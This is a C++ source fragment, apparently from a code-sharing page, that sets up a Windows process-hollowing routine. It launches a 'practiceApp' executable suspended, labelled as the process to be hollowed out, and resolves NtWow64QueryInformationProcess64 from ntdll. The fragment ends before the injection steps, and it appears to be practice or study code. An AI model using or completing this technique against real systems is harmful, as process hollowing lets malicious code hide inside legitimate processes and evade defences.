1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51
|
typedef NTSTATUS(WINAPI* pfnNtWow64QueryInformationProcess64)
(HANDLE ProcessHandle, UINT32 ProcessInformationClass,
PVOID ProcessInformation, UINT32 ProcessInformationLength,
UINT32* ReturnLength);
pfnNtWow64QueryInformationProcess64 gNtQueryInformationProcess64;
wchar_t pName[] = { L"1-64bit-practiceApp.exe" };
int main()
{
//create destination process - this is the process to be hollowed out
LPSTARTUPINFO si = new STARTUPINFO();
LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION(); // 32-64
DWORD returnLength = 0;
//wchar_t pName[] = { L"1-32bit-practiceApp.exe"}; //LPTSTR name = _tcsdup(TEXT("C:\\Windows\\Notepad.exe"));
if (!CreateProcessW(pName, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi))
{
MessageBox(NULL, L"failed to create process", L"error", MB_OK | MB_TOPMOST);
return 0;
}
HANDLE destProcess = pi->hProcess;
//dynamic linking of ntdll.dll
/*HMODULE hNtDll = LoadLibrary(L"C:\\Users\\bhara\\Desktop\\ntdll.dll");
if (hNtDll == NULL)
{
MessageBox(NULL, L"failed to load ntdll.dll", L"error", MB_OK | MB_TOPMOST);
return 0;
}*/
HMODULE NtdllModule = GetModuleHandle(L"ntdll.dll");
if (NtdllModule == NULL)
{
MessageBox(NULL, L"failed to load ntdll.dll", L"error", MB_OK | MB_TOPMOST);
return 0;
}
gNtQueryInformationProcess64 = (pfnNtWow64QueryInformationProcess64)GetProcAddress(NtdllModule, "NtWow64QueryInformationProcess64");
/*gNtQueryInformationProcess64 = (pfnNtWow64QueryInformationProcess64)GetProcAddress(hNtDll, "NtWow64QueryInformationProcess64"); */ //for 64 bit - NtWow64QueryInformationProcess64(). 32 bit- NtQueryInformationProcess
if (gNtQueryInformationProcess64 == NULL)
{
MessageBox(NULL, L"failed to get procaddress for NtQueryInformationProcess", L"error", MB_OK | MB_TOPMOST);
return 0;
}
|